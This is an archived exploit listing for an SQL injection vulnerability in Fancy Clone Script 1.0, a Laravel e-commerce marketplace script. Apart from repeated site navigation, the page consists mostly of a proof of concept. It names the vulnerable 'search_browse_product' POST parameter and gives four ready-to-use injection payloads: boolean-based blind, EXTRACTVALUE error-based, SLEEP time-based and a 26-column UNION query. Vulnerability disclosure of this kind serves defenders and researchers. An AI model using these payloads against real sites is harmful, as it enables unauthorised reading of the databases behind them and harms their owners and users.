Fancy Clone Script SQL Injection

Fancy Clone Script SQL Injection: Posted Feb 2, 2018; Authored by 8bitsec; Fancy Clone Script suffers from a search_browse_product remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 7af5b6396c165a5b75c100a0d454ebc904497c79c7cee1ba1deb31f41cc0b717; Download | Favorite | View

Fancy Clone Script SQL Injection

# Exploit Title: Fancy Clone Script - 'search_browse_product' SQL Injection
# Date: 2018-01-31
# Exploit Author: 8bitsec
# Vendor Homepage: https://pofitec.com/
# Software Link: https://pofitec.com/fancy-clone-script.php
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.13.3]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
 
Release Date:
=============
2018-01-31
 
Product & Service Introduction:
===============================
Laravel Ornate is a Multi vendor Social Ecommerce marketplace script inspired from the world famous peer to peer marketplace like Fancy and Etsy.
 
Technical Details & Description:
================================
 
SQL injection on [search_browse_product] POST parameter.
 
Proof of Concept (PoC):
=======================
 
SQLi:
 
https://localhost/[path]/browse_product
 
Parameter: search_browse_product (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: _token=85OAJbaUmUUlBFOL1Yf0F82wp0ROTiBwgG2syHHe&search_browse_product=alloy%' AND 2261=2261 AND '%'='
 
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: _token=85OAJbaUmUUlBFOL1Yf0F82wp0ROTiBwgG2syHHe&search_browse_product=alloy%' AND EXTRACTVALUE(7589,CONCAT(0x5c,0x71717a6271,(SELECT (ELT(7589=7589,1))),0x7176767171)) AND '%'='
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: _token=85OAJbaUmUUlBFOL1Yf0F82wp0ROTiBwgG2syHHe&search_browse_product=alloy%' AND SLEEP(5) AND '%'='
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 26 columns
    Payload: _token=85OAJbaUmUUlBFOL1Yf0F82wp0ROTiBwgG2syHHe&search_browse_product=alloy%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71717a6271,0x6d466b6977594d6d6c626c746e6f515674706e7a785545577768526a484455594e5a426a46484b70,0x7176767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Itxn
 
==================
8bitsec - [https://twitter.com/_8bitsec]

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Fancy Clone Script SQL Injection

Fancy Clone Script SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Fancy Clone Script SQL Injection

Share This

Fancy Clone Script SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems